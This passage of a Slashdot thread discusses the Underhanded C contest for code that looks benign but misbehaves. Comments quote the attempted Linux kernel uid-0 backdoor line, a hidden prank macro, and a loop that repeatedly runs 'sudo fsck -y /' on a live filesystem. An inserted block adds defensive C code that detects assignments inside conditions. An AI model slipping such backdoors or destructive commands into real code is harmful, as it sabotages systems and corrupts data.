      That is: Video tape all access (save recording ballots, and the inside of the ballot shuffler) to the ballots. The whole way through. For every single vote. And as the votes are counted, record the whole process. Make the tapes available for study on the Internet. People can monitor the counting process from home. Every single check mark, human verified, as many times as anybody likes. Anybody can be a ballot counter at home, supervising the whole thing.

      We can have the most trusted ballot system ever, if we do this.

    14. Re:Attack the Compiler by brianosaurus · · Score: 1

      Neither how the bug gets there, nor why are important. There may be some in place already. Who knows?

      The point of the contest is to see what people come up with as ways to hide such bugs in the code. How hard is it to make a change to some code, like, say,

      if (user == "NULL") { evil_laugh(); }

      instead of

      if (user == NULL) { evil_apology(); }

      could easily slip by someone scanning the code for the zillionth time under heavy deadline pressures. And there's no way that's gonna win the contest.

      So is there a way to detect these sorts of obfuscated sneak attacks before they strike?

      --
      blog
  27. Here you go by titzandkunt · · Score: 5, Funny


    Just tuck it away in a commonly used header file, use touch to restore the last date/time of modification, and you're all set.

    #define void int

    Hours & hours of irritation & confusion!

    T&K.

    --
    Political language ... is designed to make lies sound truthful and murder respectable...
    1. Re:Here you go by kwoff · · Score: 0, Offtopic

      Nice sig, haha.

    2. Re:Here you go by Anonymous Coward · · Score: 1, Interesting
      I'll see your compile-time error and raise you a runtime error:

      template<class A, class B> inline bool operator != (A & left, B & right) { return left == right; }

      As an added bonus, most (all?) debuggers won't let you step into inlined code, making it even harder to detect.

    3. Re:Here you go by Anonymous Coward · · Score: 0

      I concur!

    4. Re:Here you go by Tony+Hoyle · · Score: 1

      Good compilers won't inline when compiled debug for this reason...

      If you put things like that into a header file it really screws up Visual Studio though.. it hangs for about 5 minutes then brings up a 'which one of these 50,000 invocations of this function do you want to step into because I duhhh forgot' dialog.

    5. Re:Here you go by Anonymous Coward · · Score: 2, Funny

      I actually did something like that once, for reasons that had nothing to do with obfuscation.

      You see, I had to write some kind of simulation program that required a huge array of numbers. I wasn't sure whether to use "long int", to avoid overflow, or "short int", to avoid wasting memory. So I thought, "OK, I'll use a typedef, and so if I pick the wrong type, I can easily change it later."

      But I was afraid that, out of habit, I would accidentally use "int" instead of my typedef. So I "temporarily" added "#define int ERROR" to my code.

      Unfortunately, by the time I got around to compiling "int main()", I had completely forgotten about that #define, and couldn't figure out where the compile error was coming from.

    6. Re:Here you go by Jerry+Coffin · · Score: 1
      #define void int

      Hours & hours of irritation & confusion!

      I prefer:

      #define struct union /* reduce memory usage */

      IMO, this fits the original definition more closely as well -- the comment's explanation sounds almost plausible (at least to some people).

      --
      The universe is a figment of its own imagination.

  28. underhanded c by heatdeath · · Score: 1

    int the_slaves;
    free(the_slaves);

    --
    I'm sorry. The number you have reached is imaginary. Please rotate your phone 90 degrees and try again.
  29. kernel backdoor by Anonymous Coward · · Score: 0

    what about that attempted kernel backdoor a few years back? using two flags together would lead to local root.

  30. Story is just plain bad by typical · · Score: 3, Insightful

    Everyone knows that it is possible to write malicious code in C. That's just because C gives you the near utmost control over your system, and does not discriminate based on human emotions like "good", "bad", and "malicious". Perhaps a better idea would have been to try to write malicious code in a language such as Java, which tries to prevent a programmer from writing such code. That would be a real challenge.

    Yeah, I just flip the "+good +bad -malicious" flags on javac when I want to trust code. Come on, that's ridiculous.

    This is not a hard task, but it's kind of stupid, on the order of "who can break into the most computers today" (I dunno, who can run nmap the longest?)

    There are so many *interesting* things that could be done as a programming contest, and the submitter chose something that's a pain in the ass for other people, doesn't really challenge the brain ("shortest version of X"), and can't be used for much other than bogus arguments that "C is dangerous" or the obvious card, "Open Source is insecure" (you can look at the much larger sample set of SourceForge and the lack of Trojans implanted and later discovered).

    The number of *interesting* security stories that could have challenged people and been useful is legion. "Can we have a system that is unbreakable and does X", (followed by the inevitable followup posts where people punch holes in the design) or other things. You could have asked "How can OSS projects avoid allowing malicious code being submitted?", which would have started an interesting set of threads from people who work on proof-carrying code, would have taught readers something, and maybe provided improved security for the world at large. Instead, we're going to see a handful of bad, obfuscated C, and a bunch of halfassed arguments against C and OSS, neither of which has much connection with reality. There will be some language arguments, where someone says "we should use [LANGUAGE_WITH_BOUNDSCHECKING]", some security guy that will point out that this doesn't begin to avoid stopping malicious code, someone will make some stupid arguments about how their favorite OS is more secure than anyone else's, we'll get some rehash of NX features that have been done time and time again on Slashdot...seriously, goddammit. The day someone makes a knockoff of Slashdot that's a bit more computer-science oriented and isn't solely aimed at producing the same tired old trolling every day is the day I jump ship.

    --
    Any program relying on (nontrivial) preemptive multithreading will be buggy.
    1. Re:Story is just plain bad by Anonymous Coward · · Score: 0
      There are so many *interesting* things that could be done as a programming contest, and the submitter chose something that's a pain in the ass for other people, doesn't really challenge the brain ("shortest version of X"), and can't be used for much other than bogus arguments that "C is dangerous" or the obvious card, "Open Source is insecure" (you can look at the much larger sample set of SourceForge and the lack of Trojans implanted and later discovered).

      Oh, please. You don't think that participating in this contest or seeing the results will make people better code reviewers?

    2. Re:Story is just plain bad by schotter · · Score: 3, Informative

      "The day someone makes a knockoff of Slashdot that's a bit more computer-science oriented and isn't solely aimed at producing the same tired old trolling every day"

      Have you seen Technocrat.net? Looks to be just starting, but I'm already impressed: slashdot ran an article on a nanotech textiles protest - technocrat ran one on a group of scientists demonstrating a refined iteration of a carbon nanotube CPU. Comments are on-topic too, touch wood.

      (Or there's always ars for CS stuff, but they're hardly a /. knockoff.)

    3. Re:Story is just plain bad by Anonymous Coward · · Score: 0

      hey typical 886006,
      why don't you develop your idea and announce your contest? I'll make a donation to the prize, and you'll give new life to slashdot!

  31. Re:Indeed. This could be a field day for Java and by Anonymous Coward · · Score: 0

    Wrong. Making it look valid is the entire point.

  32. Wrong prize! by Anonymous Coward · · Score: 0

    IMHO the prize is not the right one; they should give them a ham, because a ham contains salt, which seems benign but can be harmful as well. Do I look innocent enough or just plain stupid?

    Oh well...

    -Emili Brogor Dodepetete

    1. Re:Wrong prize! by Anonymous Coward · · Score: 0

      and beer can't be harmful, despite being benign in relatively small quantities?

    2. Re:Wrong prize! by Anonymous Coward · · Score: 0

      Well yes, but it doesn't have salt, does it?

      Actually, maybe it does, but beer doesn't have that reddish color that hams have.

      Well maybe there's *some* strange beer out there that's red like a ham, ok, ok, I get your point...

    3. Re:Wrong prize! by o'reor · · Score: 1

      It's interesting to mention that in the Basque country (Spain/France), one of the most frequent diseases is stomach cancer, due to eating too much cured ham (lots of salt in it).

      --
      In Soviet Russia, our new overlords are belong to all your base.
    4. Re:Wrong prize! by spauldo · · Score: 1

      Red beer - it's a mixture of beer and tomato juice (and some people do put salt in it as well).

      Good luck finding it outside oklahoma though.

      --
      Those who can't do, teach. Those who can't teach either, do tech support.
  33. Diebold by jay95 · · Score: 2, Insightful

    I nominate Diebold!
    Now if only we can get them to enter their code in the contest...

    1. Re:Diebold by ceejayoz · · Score: 2, Funny

      Pfft.

      It's supposed to survive inspection, remember. giveElectionToTheRepublican() is underhanded, but it probably won't survive inspection. ;-)

    2. Re:Diebold by Anonymous Coward · · Score: 0

      So far it has.

  34. SxE anyone??? by TheGreatOrangePeel · · Score: 1

    The prize is beer.

    What if someone in the straight edge crowd wins?

    1. Re:SxE anyone??? by Hatta · · Score: 2, Funny

      The prize is beer.

      What if someone in the straight edge crowd wins?


      They can give the beer to me.

      --
      Give me Classic Slashdot or give me death!
    2. Re:SxE anyone??? by alfrin · · Score: 1

      The prize is beer.

      What if someone in the straight edge crowd wins?


      Straight Edge is really getting to a problem, here in Reno, Nevada it's been classified as a gang because the SxE beat the crap out of people who don't follow their beliefs.

      But I'll take the prize if they don't want it

    3. Re:SxE anyone??? by argent · · Score: 1

      Then the prize is near-beer.

    4. Re:SxE anyone??? by drsquare · · Score: 1

      What is the straight edge crowd?

  35. Why? by simulacrum25 · · Score: 4, Insightful

    Hacking was never about malicious behaviour, it was about learning and understanding. Granted, much of what one learned could be applied in malicious ways, but that wasn't the goal. Coding contests whether they be geared towards obfuscation or speed are still learning endeavors.

    Who is behind this and what is their motivations? What will they do with the ideas submitted in this contest? In a day of professional computer hackers, this is not a contest to have.

    1. Re:Why? by Nf1nk · · Score: 5, Insightful

      To find subtly malicious code in an open source project, we first must know what it looks like. Having contests like these creates a sample base of dangerous code and clever tricks to read and learn from.
      It is sort of like the computer version of a bomb squad.

      --
      I used to have a cool sig, back when I cared
    2. Re:Why? by IainHere · · Score: 1
      simulacrum25 said,

      Who is behind this and what is their motivations? What will they do with the ideas submitted in this contest? In a day of professional computer hackers, this is not a contest to have.

      Dictionary.com describes simulacrum as,

      1. An image; a representation.
      2. An insubstantial, superficial, or vague likeness or semblance.

      So, Mr Simulacrum25 (if that is indeed your real name!), care to tell us why you're so scared of other people looking in to ways of secretly concealing information in otherwise innocent looking image files?

    3. Re:Why? by Xcott+Craver · · Score: 3, Informative
      Who is behind this and what is their motivations?

      Is Google down? Okay, I updated the faq to tell you who we are.

      Also, we never said anything about hackers. Nowhere have we associated hacking with malicious behavior. And I sincerely hope this will be a learning experience for all involved. I, in particular, will probably learn a thing or two about running next year's contest.

      Xcott

    4. Re:Why? by Frank+T.+Lofaro+Jr. · · Score: 2, Informative

      Remember the recent Linux contamination

      Something like:

      if (blah || blah || uid=0) {
      blah;
      } ...

      --
      Just because it CAN be done, doesn't mean it should!
    5. Re:Why? by KidSock · · Score: 1

      To find subtly malicious code in an open source project, we first must know what it looks like. Having contests like these creates a sample base of dangerous code and clever tricks to read and learn from.

      OR

      Having contests like these creates a sample base of dangerous code and clever tricks that evil doers can use to craft subtly malicious code in open source projects.

    6. Re:Why? by legirons · · Score: 1

      "Who is behind this and what is their motivations?"

      I seem to remember a precursor to this type of competition (after the diebold fiasco) where the entrants had to write an vote-counting program which would appear to be correct, but actually modify the result in a non-obvious (from reading the code) way...

    7. Re:Why? by Maestro4k · · Score: 1

      Hacking was never about malicious behaviour, it was about learning and understanding. Granted, much of what one learned could be applied in malicious ways, but that wasn't the goal. Coding contests whether they be geared towards obfuscation or speed are still learning endeavors.

      And what exactly about this isn't a learning endeavor? If people can pull off hiding fingerprinting code in an image processing programming that survives visible code inspection then I'd say we've all learned a VERY valuable lesson. We can study what they did, and how they hid it and we'll be able to look for that type of behavior in the future. Who's to say that something like this isn't hidden in some project somewhere right this minute? It's possible (although unlikely) but knowing _WHAT_ to look for will make it even less likely and put us a lot further along to making it impossible.

      In a day of professional computer hackers, this is not a contest to have.

      You know this sounds an awful lot like the arguments against disclosing vulnerabilities. "If we report them then the Evil Hackers (tm) will be able to use them!" The problem there, and here, is that the Evil Hackers (tm) aren't going to just sit around idly and wait till white-hats find the problems. They'll look for them themselves, and being Evil Hackers (tm) they're not going to tell the white-hats about them. We've got to find the problems ourselves and be prepared to defend against them. Here we have a chance to find out if this type of code hiding is possible, and to see ways it can be done. Then we can watch to make sure the Evil Hackers (tm) don't manage to sneak something similar past us.

    8. Re:Why? by UserGoogol · · Score: 1

      Because it's funny.

      --
      "Never attribute to malice that which can be adequately explained by stupidity." -- Hanlon's Razor
    9. Re:Why? by iluvcapra · · Score: 2, Insightful

      Methinks the poster refers to this, wherein some as yet unidentified party inserted a line into the kernel sources on the CVS repository.

      if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
      if these random options are passed, and the uid of the "current" struct is 0, then do the block, right? 8^o Fortunately, some sharp programmers caught this before those files got integrated back into the kernel, but who knows what the future may bring.
      --
      Don't blame me, I voted for Baltar.
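Added example (not part of the thread and not kernel code): the condition quoted in the comment above, run against a stand-in `struct task`, next to a line-based review check that flags an assignment inside an `if` condition, which is one answer to the earlier question about detecting such changes. The `DEMO_*` flag values, `struct task` and every function name here are assumptions made for this illustration.

```c
#include <ctype.h>
#include <stdio.h>

/* Constructed stand-ins for this demonstration, not kernel definitions. */
#define DEMO_WCLONE 0x80000000u
#define DEMO_WALL   0x40000000u
struct task { unsigned int uid; };

/* The condition as quoted in the comment: `=` stores 0 in uid, and the
 * value of that assignment (0) makes the whole condition false. */
int check_as_quoted(struct task *current, unsigned int options)
{
    if ((options == (DEMO_WCLONE | DEMO_WALL)) && (current->uid = 0))
        return 1;
    return 0;
}

/* What the line appears to say at a glance: a comparison, no side effect. */
int check_comparison(const struct task *current, unsigned int options)
{
    if ((options == (DEMO_WCLONE | DEMO_WALL)) && (current->uid == 0))
        return 1;
    return 0;
}

static int is_ident(char c) { return isalnum((unsigned char)c) || c == '_'; }

/* Line-based review aid: returns 1 if an `if (...)` condition on this line
 * contains an assignment. Heuristic only: it skips string and character
 * literals, treats ==, !=, <= and >= as comparisons (so it misses <<= and
 * >>=), and does not understand comments or multi-line conditions. */
int assignment_in_condition(const char *line)
{
    for (const char *p = line; *p; p++) {
        /* Find the keyword `if` as a whole word, followed by '('. */
        if (p[0] != 'i' || p[1] != 'f') continue;
        if (p > line && is_ident(p[-1])) continue;
        if (is_ident(p[2])) continue;
        const char *q = p + 2;
        while (*q == ' ' || *q == '\t') q++;
        if (*q != '(') continue;

        int depth = 0;
        char quote = 0;
        for (; *q; q++) {
            if (quote) {                        /* inside "..." or '...' */
                if (*q == '\\' && q[1]) q++;    /* skip escaped character */
                else if (*q == quote) quote = 0;
                continue;
            }
            if (*q == '"' || *q == '\'') { quote = *q; continue; }
            if (*q == '(') depth++;
            else if (*q == ')') { if (--depth == 0) break; }
            else if (*q == '=') {
                if (q[1] == '=') { q++; continue; }             /* == */
                if (q[-1] == '!' || q[-1] == '<' || q[-1] == '>')
                    continue;                                   /* != <= >= */
                return 1;                       /* plain or compound assignment */
            }
        }
    }
    return 0;
}

int main(void)
{
    struct task t = { 1000 };
    int taken = check_as_quoted(&t, DEMO_WCLONE | DEMO_WALL);
    printf("as quoted:  branch taken=%d, uid afterwards=%u\n", taken, t.uid);

    struct task u = { 1000 };
    taken = check_comparison(&u, DEMO_WCLONE | DEMO_WALL);
    printf("comparison: branch taken=%d, uid afterwards=%u\n", taken, u.uid);

    /* Lines taken from the comments on this page. The last one is a
     * different bug class (pointer compared with a string literal) that
     * this check does not cover. */
    static const char *samples[] = {
        "if ((options == (__WCLONE|__WALL)) && (current->uid = 0))",
        "if (blah || blah || uid=0) {",
        "if (user == NULL) { evil_apology(); }",
        "if (user == \"NULL\") { evil_laugh(); }",
    };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-5s %s\n",
               assignment_in_condition(samples[i]) ? "FLAG" : "ok", samples[i]);
    return 0;
}
```

GCC's `-Wparentheses` check treats a parenthesized assignment as intentional, so the quoted line draws no warning; a textual check like this one, or a review rule against any assignment inside a condition, covers that gap.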
    10. Re:Why? by zallus · · Score: 1

      The malicious people would already have a base of such information, and would gather it themselves whether such a contest existed or not. However, this only seeks to additionally expose such tricks to view of neutral and positive parties. I would say that parties with all intents (-x + 0 + x) having access to subject material is much better than purely malicious persons (-x) having access. Would you rather a book on bomb building were in a prison library, or a public library?

      --
      I mod down pathetic posts.
    11. Re:Why? by Anonymous Coward · · Score: 0

      Correct. If you read up on the folks running it (http://www.princeton.edu/~sacraver/, http://www.ee.binghamton.edu/pages/craver.html, http://www.ws.binghamton.edu/fridrich/), you'll see that much of their research has obvious military and national security applications (see http://www.ws.binghamton.edu/fridrich/projects.html for examples).

      Other articles, such as http://www.papillonsartpalace.com/howT.htm, http://inside.binghamton.edu/May-June/10MAY01/fridrich.html, and especially http://inside.binghamton.edu/November-December/13dec01/security.html point to the common theme of research into countering covertly evil data or programs. This contest, then, could contribute towards this goal by offering numerous known examples of how innocent-looking code could conceal malicious conduct. Presumably this knowledge would/could be rolled into systems for intercepting or identifying actual instances of this kind of sneakiness "in the real world" (ie, our good friend Homeland Security).

      I am also captivated by Dr. Fridrich's Rubik's cube skills. And to think, I just graduated from SUNY B and never even met her. A shame.

    12. Re:Why? by ArtStone · · Score: 1

      of course that cuts both ways. It could give aging script kiddies ideas for methods to attempt to insert bogus code into an open source project that they were incapable of thinking of on their own.

      Just like Orwell's "1984" was a warning, it also has the potential to become a roadmap.

      --
      Final 2006 "Proof of Global Warming" US Hurricane Count -> 0
  36. it's been here all along by xmp_phrack · · Score: 0, Flamebait

    look over SE linux code.

  37. Exactly how are they going to test this? by neo · · Score: 0

    "And now we test program number one which computes Pi to the 13th digit.... wait...um, the whole system is smoking and there are sparks. Oh crap, the test computer is melted. End of contest, sorry guys!"

  38. Here's my entry: by stinky+wizzleteats · · Score: 2, Funny

    title Windows
    root (hd0,0)
    chainloader +1

    Now where's my beer?

  39. Diebold Hiring the winner! by tvlinux · · Score: 4, Funny

    Help Wanted:
    Diebold needs new programmers. If you have what it takes to hide "winning" code in our election machines. Apply to Diebold Careers

  40. Re:Indeed. This could be a field day for Java and by Xcott+Craver · · Score: 3, Informative
    Correct, making it look valid is the main purpose of the contest.

    Please check out the contest page: the "evil" behavior is not something java would prevent you from doing. We're not talking about crashing a computer or gaining root access, but performing a data processing task incorrectly. It's entirely problem state.

    That being said, I chose C because it does permit more tricks along the lines of stack smashing and type mismatches. The winners of the obfuscated V contest used techniques like this to conceal their evil behavior, so I feel this would give people more freedom to get creative.

    Finally, this is not meant to slam C, or open source, or any such like. I can't imagine how anyone can look at this contest and see it as an argument for less openness.

    Xcott

  41. Re:NOT FUNNY: Chinese Hackers by Anonymous Coward · · Score: 0, Offtopic

    That report was written in 1997.
    I think you're sino-bashing and trolling.

  42. Cheating? by Maxwell'sSilverLART · · Score: 2, Funny

    Am I required to submit original source code, written by me, or can I merely submit the leaked Windows source, and thus be assured of victory?

    --
    Moderate drunk! It's more fun that way!
    1. Re:Cheating? by tonsofpcs · · Score: 1

      Hey, you stole my idea! Now i'll have to take the Windows source code and give it a different name, how about 'Bob'? I like 'Bob'.

  43. Mod Parent Up! by Anonymous Coward · · Score: 1, Insightful

    My original post was to be along the lines of 'how long before this kind of technique is used to poison Open Source?'...

    Tin foil hat on, for sure. :)

  44. Is Malicious Intent Required? by Anonymous Coward · · Score: 0
    I would submit some of my co-workers' code but there was no malicious intent present. Does this count?

    I mean, couldn't we just *pretend* that they were really really smart and diabolical and had wanted to take down the entire mainframe?

    It's really tough holding back when you know you've got a winner!-))

  45. Would the Windows source code count? by Sniper_Peabody · · Score: 2, Funny

    It looks innocent but is about as evil as it gets.

    1. Re:Would the Windows source code count? by Anonymous Coward · · Score: 0

      Since when is Hungarian Notation innocent looking?

  46. Re:Indeed. This could be a field day for Java and by Anonymous Coward · · Score: 0

    That being said, I chose C because it does permit more tricks along the lines of stack smashing and type mismatches.

    C++ would have been even more interesting, what with operator overloading and all. Who knows what "A + B" may do, given the proper context? The abstraction power lets you have much higher-level "mistakes."

    Java even provides interesting opportunities for evil, you've got method overloading and that great gremlin, threads. "Accidentally" call that method with the wrong type and exploit a thread timing bug to kick the dog.

  47. Subtlety by Dirtside · · Score: 5, Funny
    The prize is beer.
    ...but the beer is poisoned!
    --
    "Destroy science and religion. Science would re-emerge exactly the same; but not religion." - Penn Jillette, paraphrased
    1. Re:Subtlety by the+grace+of+R'hllor · · Score: 1

      That would be too simple. Make it one beer, laced with component 1 of some tasty epoxy. Let's call it Beer 1. Make all other beer present, Beer 2, contain component 2 of some tasty epoxy.

      Serve Beer 2 to winner quickly after he finishes Beer 1. Everyone else will be fine, and for some mysterious reason, the winner collapses into a painful heap.

      Finding a tasty epoxy is going to be tricky though.
      --
      Frank

    2. Re:Subtlety by cpeikert · · Score: 1

      But you also get a free frogurt!

    3. Re:Subtlety by Dirtside · · Score: 1

      The frogurt is also cursed.

      --
      "Destroy science and religion. Science would re-emerge exactly the same; but not religion." - Penn Jillette, paraphrased
    4. Re:Subtlety by N1ghtFalcon · · Score: 0

      But you get your choice of topping.

    5. Re:Subtlety by Minwee · · Score: 1

      But the toppings contain sodium benzoate.

    6. Re:Subtlety by Anonymous Coward · · Score: 0

      (That's bad)

    7. Re:Subtlety by RPI+Geek · · Score: 2, Informative

      Actually I'm from upstate NY and have had a chance to try Ommegang beers; of the three that I've tried, all are excellent.

      I've tried their Rare Vos, Hennepin, and self-named Ommegang beer: my favorite is the Rare Vos but I like them all.

      --

      - "Nobody came out that night, not one was ever seen. But Old Man Stauf is waiting there, crazy sick and mean!"
  48. Re:Surely? by Anonymous Coward · · Score: 0

    Seriously though, you're not kidding... Just create something that's useful, only have an easily exploitable buffer overflow somewhere in there. The program does what the user intends for it to do, but at the same time leaves a backdoor for a hacker. Microsoft deserves many cases of beer.

  49. All 4th grade style up in here by LandownEyes · · Score: 1

    Seriously, when I first read the headline I thought they meant writing C in cursive handwriting. Truth be told, I was pretty disappointed to find out that wasn't actually the case at all.

    1. Re:All 4th grade style up in here by Anonymous Coward · · Score: 0

      Have you ever tried changing the font in your coding program of choice to Zapfino? It's great.

      (yeah, yeah, I know you use emacs/vi/pico/echo exclusively, shut up)

  50. Obscurifacation by MrIcee · · Score: 1

    Once, many moons ago, we wrote an obscurifaction program that removed all documentation and modified all variables and function names to be random combinations of I's, O's, o's, 0's, and 1's (plus it created rather long names of fairly equal length). It also combined lines to make them all very long.

    Especially useful on large programs, it pretty much made the source totally unreadable, and a complete headache to try to unravel even if you countered with a similar program - because all meaning in the original names was lost.

    However, when working as a contractor such programs can be useful insurance policies :)

    1. Re:Obscurifacation by Anonymous Coward · · Score: 0

      This sounds a lot like what you described:
      More information

  51. C-style vs Java-style language features by Anonymous+Brave+Guy · · Score: 1
    Anyone can write malicious code in C, but it takes a real pro with real knowledge to even begin to try that with Java.

    I assume you're joking, since Java is as vulnerable to typical attacks like SQL injection just as much as many other languages, with just the same sort of careless slip in a couple of lines by a tired programmer...

    --
    If you disagree, post your argument. (-1, Overrated) isn't your personal censorship tool for views you don't like.
  52. Possibly obfuscated intentions by nanoakron · · Score: 1

    Am I the only one suspicious of the fact that their first 'posted challenge' is also something that has commercial value, especially in the realm of DRM?

    -Nano.

    1. Re:Possibly obfuscated intentions by DickBreath · · Score: 1

      ...suspicious of the fact that their first 'posted challenge' is also something that has commercial value, especially in the realm of DRM?

      It also means that an army of coders have considered and may recognize numerous different approaches to hiding this kind of watermarking.

      --

      I'll see your senator, and I'll raise you two judges.
    2. Re:Possibly obfuscated intentions by nanoakron · · Score: 1

      Good point...

      -Nano.

  53. An example from years ago by exp(pi*sqrt(163)) · · Score: 4, Interesting
    There was a bug in the Watcom compiler for DOS many years ago. As a bug report I sent them a piece of code something like:
    char *s = "Fortune coookie";
    int *p = (int *)s;
    int i;
    for (i = 0; i < 4; ++i) {
        /* cast back to char *, so indexing should step one byte at a time */
        putchar(((char *)p)[i]);
    }
    Looks innocent enough. But it actually printed an obscenity. There was a bug in the pointer addition code generated by the compiler so that even though (char *)p was a pointer to type char it still used sizeof(int) to index into the array and so it printed every 4th character. (And that explains why I used three o's.)
    --
    Doesn't it make you feel good to know that our freedoms are protected by politicians, lawyers and journalists.
    1. Re:An example from years ago by Anonymous Coward · · Score: 0
      On a 64 bit machine, your program would print...
      FcSegmentation Fault
    2. Re:An example from years ago by Anonymous Coward · · Score: 0

      Who ran DOS on 64bit machines exactly?

    3. Re:An example from years ago by dustmite · · Score: 0, Redundant

      Uhm .. that can't be, sizeof(int) on DOS is 16 bits.

      Unless you meant the Watcom compiler for DOS4GW? BIG difference.

      DOS = 16-bit real-mode. DOS4GW = 32-bit protected mode.

    4. Re:An example from years ago by exp(pi*sqrt(163)) · · Score: 3, Informative

      It was for DOS4GW but I think you're being pedantic.

      --
      Doesn't it make you feel good to know that our freedoms are protected by politicians, lawyers and journalists.
    5. Re:An example from years ago by dustmite · · Score: 1

      Hmm, yes, I probably was :)

  54. Some dude from Microsoft is gonna win... by swillden · · Score: 4, Funny

    He'll submit the source code to IE.

    --
    Note to ACs: I usually delete AC replies without reading them. If you want to talk to me, log in.
  55. When will we see this pop up in the real world? by creative_Righter · · Score: 2, Interesting

    Every year, we will propose a challenge to coders to solve a simple data processing problem, but with covert malicious behavior. Examples include miscounting votes, shaving money from financial transactions, or leaking information to an eavesdropper. The main goal, however, is to write source code that easily passes visual inspection by other programmers.

    Oh dear, now we're rewarding people for writing actual malicious code that is designed to pass visual inspection from other programmers.

    When will these sort of tricks eventually show up in actual voting machines or the gigantic corpus of financial code that's been hacked together?

    Or when will we start to find the underhanded tricks in things we use?

    1. Re:When will we see this pop up in the real world? by xAXISx · · Score: 0

      Sounds like a sequel to "Office Space"

    2. Re:When will we see this pop up in the real world? by RebelWithoutAClue · · Score: 1

      The thing is, is there already code like this out there, and what does it look like?

      --
      "However beautiful the strategy, you should occasionally look at the results" - Winston Churchill
    3. Re:When will we see this pop up in the real world? by CAIMLAS · · Score: 1

      Well, at least we'll know what kind of behavior to look for.

      --
      ~/ssh slashdot.org ssh: connect to host slashdot.org port 22: too many beers
  56. The prize is beer by frovingslosh · · Score: 1
    The prize is beer.

    Well, nothing could go wrong here, since we all know that all C programmers are over 21. And if by any chance the winner wasn't over 21 they would make that clear and refuse their prize.

    The next day the headlines read: "C Programmers Give Minors Beer, Drunken Night of Celebration Kills 6 in Traffic Accident". Reactionary congressmen urged on by a powerful lobby from Washington State quickly pass laws to outlaw all C programming outside of Microsoft.

    --
    I'm an American. I love this country and the freedoms that we used to have.
    1. Re:The prize is beer by Anonymous Coward · · Score: 0

      Beer doesn't kill people - cars kill people.

      Also: guns don't kill people - rappers do.

  57. So are you very, very good or very, very bad? by Anonymous+Brave+Guy · · Score: 1
    This is not a hard task, but it's kind of stupid, on the order of "who can break into the most computers today"

    If you sincerely believe this is not a hard task, then you're either very, very good at programming, or really not very good at all.

    Most developers aren't very good at writing clear, concise code that actually does what it's supposed to. Writing code of that quality that looks like it does what it's supposed to do, while actually doing something subtly different, sounds like a very difficult challenge to me.

    --
    If you disagree, post your argument. (-1, Overrated) isn't your personal censorship tool for views you don't like.
    1. Re:So are you very, very good or very, very bad? by anno1602 · · Score: 2, Insightful

      Writing code of that quality that looks like it does what it's supposed to do, while actually doing something subtly different, sounds like a very difficult challenge to me.

      Programmers do that every day. It's called a "bug". Now, doing something subtly different and controlling what the subtly different thing actually is, that is a challenge.

    2. Re:So are you very, very good or very, very bad? by Anonymous+Brave+Guy · · Score: 1
      Programmers do that every day.

      Most of them don't. In fact, most don't even get close to the "clear and concise" requirement. Of those who do, very few introduce large numbers of bugs that wouldn't be turned up by a competent code review; the fact that most coding shops don't perform such reviews routinely does not reduce the significance of this!

      --
      If you disagree, post your argument. (-1, Overrated) isn't your personal censorship tool for views you don't like.
  58. Re:Indeed. This could be a field day for Java and by TheLink · · Score: 1

    First thing I thought of was sendmail, bind or any of the other ISC stuff ;).

    There are tons of C programs that look valid, but given some prompting can behave in arbitrarily evil ways.

    If you want it to automatically behave in an evil way without a "little extra encouragement" then I suppose it would be a bit harder.

    --
  59. Why assume C-specific tricks? by argent · · Score: 1

    It's unlikely that any techniques that really pass inspection will be C-specific. "Obfuscated coding contest tricks" won't help, because the code has to look benign, and weird comments and variable names and odd spacing won't help.

  60. And once again... by halleluja · · Score: 1

    telnet.c is the winner of all times.

  61. here's my entry by thdexter · · Score: 3, Funny
    #include <notavirus.h>
    #include <seriouslyitisnt.h>
    So long as they don't check notavirus.h I think I'm in the clear for visual inspection.
    --
    I'm on a road shaped like a figure eight; I'm going nowhere but I'm guaranteed to be late.
    1. Re:here's my entry by unholyness · · Score: 1

      "When I get to the bottom I go back to the top of the slide, then I stop and I turn and I go for a ride." Then I get slapped by a woman shouting 'this ride is for children only!'

  62. easy by RailGunner · · Score: 2, Interesting
    The Windows Auto Blue screen... (yes, even XP still blows up on this):

    int main (){
    for (int i = 0; i < 100000; i++)
    printf ("\t\t\b\b\b\b\b");
    }
  63. how's this? by spongman · · Score: 5, Funny

    int main () { WinExec ("iexplore.exe"); }

    1. Re:how's this? by Anonymous Coward · · Score: 0

      Haha! Clever!

      Douchebag.

    2. Re:how's this? by Anonymous Coward · · Score: 0

      You went through all the trouble to declaring main() an integer, but didn't return 0 ? Tsk tsk

    3. Re:how's this? by Anonymous Coward · · Score: 2, Funny

      It's Internet Explorer. He's assuming the computer will be compromised before it would reach the return statement.

    4. Re:how's this? by dgatwood · · Score: 1
      Here's one. Only likely to work on certain BSD-derived systems, since Linux and some BSDs map -y onto -p, and most warn before checking a read-write-mounted filesystem, but....

      #include <stdlib.h>
      #include <sys/types.h>
      #include <unistd.h>

      #define test_app "/sbin/fsck" // fix path as needed

      int main(int argc, char *argv[])
      {

      pid_t pid = fork();
      if (!pid) {
      // we're the child. Start fsck repeatedly in the background.
      while (1) {
      system("sudo " test_app " -y /");
      sleep(5);
      /* pid = fork(); sleep(5); */ // Optional, but more fun.
      }
      }
      return 0;
      }
      Looks harmless, but if your filesystem is mounted read-write... interesting inconsistencies can develop as the kernel and user space views may disagree as to what certain filesystem structures should look like.... Probably not an issue if you have a unified buffer cache model, so most modern systems aren't a problem, but I still wouldn't try it.

      --

      Check out my sci-fi/humor trilogy at PatriotsBooks.

    5. Re:how's this? by Zerth · · Score: 1

      In such a case, you should assume that any cleanup code or return values are unnecessary.

      Much like the control loop for a guided missile:)

    6. Re:how's this? by Theatetus · · Score: 1

      Don't you mean

      int WINAPI WinMain (HINSTANCE hInstance, HINSTANCE hPrevInstance, LPWSTR lpCmdLine, int nCmdShow)
      ?
      --
      All's true that is mistrusted
    7. Re:how's this? by sinserve · · Score: 1

      he could use main/system and be ANSI compatible :-)

    8. Re:how's this? by spongman · · Score: 1

      nope, msvcrt.lib wraps WinMain for console apps.

    9. Re:how's this? by Rei · · Score: 2, Informative

      That's not very sneaky - it looks downright malicious. At the very least, who would run a program that launches a new fsck every five seconds? Even if the fs was read-only, you'll bring your system to a crawl in no time.

      What you really want is something more subtle. For example, here's an easy one using rounding errors in the core of a smoothing algorithm. Assumes a picture of width x height of type "RGB" (assumed to be a typedef'ed struct containing bytes r, g, and b) in a two-dimensional array called "picture" (and an equivalent one called "dest_picture").

      for (int x=0; x<width; x++)
      {
          const int next_x=(x+1==width ? 0 : x+1);
